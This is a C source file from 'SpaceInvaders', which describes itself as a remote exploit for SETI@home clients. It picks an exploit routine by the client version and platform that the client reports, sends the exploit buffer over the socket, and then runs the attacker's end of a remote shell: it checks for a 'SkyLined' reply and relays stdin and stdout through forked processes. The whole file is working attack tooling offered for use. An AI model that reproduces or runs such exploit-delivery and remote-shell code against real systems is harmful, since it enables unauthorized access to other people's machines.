/*-----------------------------------------------------------------------------
  This file is part of SpaceInvaders, a remote exploit for SETI@home clients.
  Copyright 2002, 2003 Berend-Jan Wever.
    <skylined@edup.tudelft.nl>
    http://spoor12.edup.tudelft.nl

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.

------------------------------------------------------------------------------*/

#include "exploithandler.h"

//-- Functions ----------------------------------------------------------------
int exploit(int client_handle, char* platform, int mayor_version,
           int minor_version, char* operation, char* system, char* cpu_type) {
  // Check the information supplied by the seti-client. Do we have an exploit
  // for this version of the client ? If so, start the code that generates and
  // sends exploit:
  int i;

  fprintf(stdout, "Find exploit...  ");fflush(stdout);

  if (mayor_version == 3) {
    if (minor_version == 3 && strncmp(system, "linux-gnu", 9) == 0 &&
        (strstr(cpu_type, "i386") == 0 || strstr(cpu_type, "i686") == 0)) {

      fprintf(stdout, "ok. (x86 linux-gnu by Berend-Jan Wever)\n");
      fflush(stdout);
      return exploit_x86_linux_gnu(client_handle, platform, operation);
    }
    /*
    if (minor_version == 3 && strcmp(platform, "i386-winnt-cmdline") == 0) {

      fprintf(stdout, "ok. (Windows command-line)\n");
      fflush(stdout);
      return exploit_win2k_cmdline(client_handle);
    }
    if (minor_version == 7 && strcmp(platform, "Pentium/Windows") == 0) {

      // known systems: "Windows 95: 4.10", "Windows NT: 5.0"

      fprintf(stdout, "ok. (Windows screen saver)\n");
      fflush(stdout);
      return exploit_win_screensaver(client_handle);
    }
    */
  }

  fprintf(stdout, "failed! (no exploit for this platform/version)\n");
  return 0;
}

//-----------------------------------------------------------------------------
int send_exploit(int client_handle, char* buffer, int size) {
  // "send()" wrapper with a nice errorhandler and display output, takes the
  // same arguments as send.
  int i;
  fprintf(stdout, "Send exploit...  ");fflush(stdout);
  i = send(client_handle, buffer, size, 0);
  if (i<0) {
    fprintf(stdout, "failed! (can't send data)\n");
    return 0;
  }
  if (i < size) {
    fprintf(stdout, "failed! (only %d/%d (0x%x/0x%x) bytes send)",
                                           i, size, i, size); fflush(stdout);
    return 0;
  }
  fprintf(stdout, "ok. (%d (0x%x) bytes send)\n", i, i);
  return 1;
}

//-----------------------------------------------------------------------------
int handle_shell(int client_handle) {
  // Tries to read the shell_id string from the given socket. If it receives
  // the right id, it starts two threads: one to redirect stdin to the socket's
  // input and one two redirect the socket's output to stdout.
  // Offcourse with a nice errorhandler and display routines...
  // Usefull to handle the local end of a remote shell.
  char*     shell_id = "SkyLined";
  char      buffer[9]; // strlen(shell_id)+1
  int       readchild_id, sendchild_id;
  int i;

  fprintf(stdout, "Wait on reply... ");fflush(stdout);
  i = read(client_handle, buffer, 8);
  if (i < 0) {
    fprintf(stdout, "failed! (read failed)\n", i, 8);
    fflush(stdout);
    return 0;
  }
  if (i != 8) {
    fprintf(stdout, "failed! (reply too short: %d/8 bytes)\n", i);
    fflush(stdout);
    return 0;
  }
  if (strncmp(buffer, shell_id, 8) != 0) {
    fprintf(stdout, "failed! (wrong reply)\n");fflush(stdout);
    return 0;
  }
  fprintf(stdout, "ok. (reply '%s' received)\n", shell_id);fflush(stdout);

  fprintf(stdout, "________________________________________"
                  "________________________________shell__\n");

  // readchild reads untill error, then exits
  readchild_id = fork();
  if (readchild_id == 0) {
    while(1) {
      if (read(client_handle, buffer, 1) != 1) {
        fprintf(stdout, "________________________________________"
                        "_____________read failure ended shell__\n");
        exit(0);
      }
      fprintf(stdout, "%c", buffer[0]); fflush(stdout);
    }
  }
  // sendchild sends untill error, then kills readchild.
  sendchild_id = fork();
  if (sendchild_id == 0) {
    while(1) {
      fscanf(stdin, "%c", buffer);
      if (send(client_handle, buffer, 1, 0) != 1) {
        fprintf(stdout, "________________________________________"
                        "_____________send failure ended shell__\n");
        kill(readchild_id, 9);
        exit(0);
      }
    }
  }
  // parent waits untill readchild exits or is killed.
  // it also kills sendchild if it's still alive.
  waitpid(readchild_id, NULL, 0);
  kill(sendchild_id, 9);
  return 1;
}
